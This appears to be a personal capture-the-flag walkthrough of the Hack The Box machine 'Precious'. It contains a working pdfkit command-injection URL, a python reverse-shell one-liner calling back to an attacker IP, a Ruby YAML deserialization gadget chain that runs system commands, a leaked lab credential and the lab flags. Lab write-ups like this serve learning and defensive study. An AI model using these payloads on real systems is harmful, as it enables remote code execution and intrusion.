Precious

Untitled

Added to etc/hosts

Untitled

had to use htb ip http://10.10.16.2:80

Untitled

Untitled

Untitled

Generated by pdfkit v0.8.6

tried base64 reverse

Untitled

GitHub - PurpleWaveIO/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell: pdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are
pdfkit &lt;0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tested on ver 0.8.6) - CVE-2022-25765 - PurpleW...
https://github.com/CyberArchitect1/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell
Snyk Vulnerability Database | Snyk
Critical severity (9.8) Command Injection in pdfkit | CVE-2022-25765
https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795

“an application could be vulnerable if it tries to render a URL that contains query string parameters with user input”

“if the provided parameter happens to contain a URL encoded character and a shell command substitution string, it will be included in the command that PDFKit executes to render the PDF”

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("**10.10.16.2**",**4444**));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("**sh**")'

[http://10.10.16.2:80/?name= python3](http://10.10.16.2/?name=%20%60python3) -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.16.2",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'

foothold

Untitled

Untitled

henry:Q3c1AqGHtoI0aXAYFH

Untitled

user flag

653582454a0a1c8a06f34358ddea6ba7

checking privs

Untitled

Untitled

Untitled

Ruby Vulnerabilities: Exploiting Open, Send, and Deserialization…
Ruby on Rails web application was vulnerable to 3 types of Ruby-specific RCE vulnerabilities, enabling more efficient web application exploitation.
https://bishopfox.com/blog/ruby-vulnerabilities-exploits
Blind Remote Code Execution through YAML Deserialization
While performing an application security assessment on a Ruby on Rails project, I discovered upload functionality that allowed users to upload text, CSV, and YAML files. The latter option interested me because reading online suggested YAML deserialization could be a potential vector. After a few upl
https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "<COMMAND HERE>"
         method_id: :resolve

Untitled

Untitled

Untitled

root flag

91edfddd7b7889ea9233730aa0748c5f